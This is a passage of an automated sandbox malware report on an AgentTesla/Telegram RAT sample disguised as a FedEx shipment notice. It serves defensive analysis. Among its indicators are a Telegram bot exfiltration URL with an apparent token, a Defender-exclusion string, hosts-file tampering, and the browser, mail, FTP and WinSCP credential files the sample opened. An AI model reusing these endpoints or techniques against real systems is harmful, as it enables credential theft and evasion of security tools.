                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238671
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238562
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238453
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238344
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238063
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 237313
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 237063
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 236313
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 236171
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 236060
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 235953
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 922337203685477
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518000564.00000000015B3000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_0133E330 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess created: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518645753.0000000001B00000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518645753.0000000001B00000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518645753.0000000001B00000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518645753.0000000001B00000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518645753.0000000001B00000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5604, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fa3860.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fa3860.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.257251923.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.257782427.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.514650311.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5604, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara matchFile source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5604, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5604, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fa3860.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fa3860.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.257251923.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.257782427.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.514650311.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5604, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection12File and Directory Permissions Modification1OS Credential Dumping2System Information Discovery114Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Input Capture11Query Registry1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Credentials in Registry1Security Software Discovery211SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput Capture11Scheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsVirtualization/Sandbox Evasion131SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading11Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion131DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe40%ReversingLabsWin32.Trojan.AgentTesla

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                      1.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                      1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                      1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://api.telegram.org40%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://190L8dvjH7GrrK.net0%Avira URL Cloudsafe
                      http://yWRCNh.com0%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://api.telegram.orgD80%URL Reputationsafe
                      https://190L8dvjH7GrrK.netP0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocumentfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://DynDns.comDynDNSFedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org4FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.orgFedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmpfalse
                            		high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haFedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocumentdocument-----FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpfalse
                              		high
                              https://190L8dvjH7GrrK.netFedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520470982.000000000351D000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmpfalse
                                		high
                                http://yWRCNh.comFedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://api.ipify.org%GETMozilla/5.0FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		low
                                http://api.telegram.orgFedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520470982.000000000351D000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520772376.0000000003558000.00000004.00000001.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmpfalse
                                    		high
                                    https://api.ipify.org%FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		low
                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipFedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://api.telegram.orgD8FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520772376.0000000003558000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://190L8dvjH7GrrK.netPFedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    149.154.167.220
                                    		api.telegram.orgUnited Kingdom
                                    		62041TELEGRAMRUfalse

                                    General Information

                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:528766
                                    Start date:25.11.2021
                                    Start time:18:47:26
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 18s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:23
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.adwa.spyw.evad.winEXE@3/3@2/1
                                    EGA Information:Failed
                                    HDC Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
